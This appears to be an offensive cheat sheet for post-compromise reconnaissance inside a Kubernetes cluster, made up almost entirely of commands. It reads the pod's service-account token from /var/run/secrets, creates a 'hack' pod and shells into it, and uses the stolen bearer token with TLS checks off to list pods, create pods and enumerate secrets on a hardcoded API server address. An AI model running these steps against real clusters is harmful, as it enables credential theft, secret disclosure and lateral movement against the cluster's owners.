Skip to content

internal recon

tmux setenv NAMESPACE <namespace>

Environment variables


env | grep -i kube

Service Account token


cat /var/run/secrets/kubernetes.io/serviceaccount/token

Namespace


cat /var/run/secrets/kubernetes.io/serviceaccount/namespace

Test / Debug pod


hack-pod.yaml

apiVersion: v1
kind: Pod
metadata:
  name: hack
  namespace: <some-valida-namespace>
spec:
  containers:
    - name: ubuntu
      image: ubuntu
      command:
        - sleep
        - infinity

kubectl apply -f hack-pod.yaml 
kubectl exec --stdin --tty hack -n $NAMESPACE -- /bin/sh
/bin/bash
apt update
apt install -y curl
apt install -y jq
apt install -y vim

API


List pods

curl -H "Authorization: Bearer $TOKEN" https://34.28.85.34/api/v1/namespaces/$NAMESPACE/pods/ --insecure | jq ".items[].metadata.name"

Crete pod

cat > test-pod.json <<EOF
{
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {
        "name": "ubuntu",
        "namespace": "<some-valida-namespace>"
    },
    "spec": {
        "containers": [
            {
                "name": "ubuntu",
                "image": "ubuntu",
                "command": [
                    "sleep",
                    "infinity"
                ]
            }
        ]
    }
}
EOF
securityContext:
    allowPrivilegeEscalation: false
# https://www.youtube.com/watch?v=iD_klswHJQs
curl -k -v -X POST -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://34.28.85.34/api/v1/namespaces/$NAMESPACE/pods -d@test-pod.json 

List secrets

curl -H "Authorization: Bearer $TOKEN" https://34.28.85.34/api/v1/namespaces/$NAMESPACE/secrets/ --insecure | jq ".items[].metadata.name"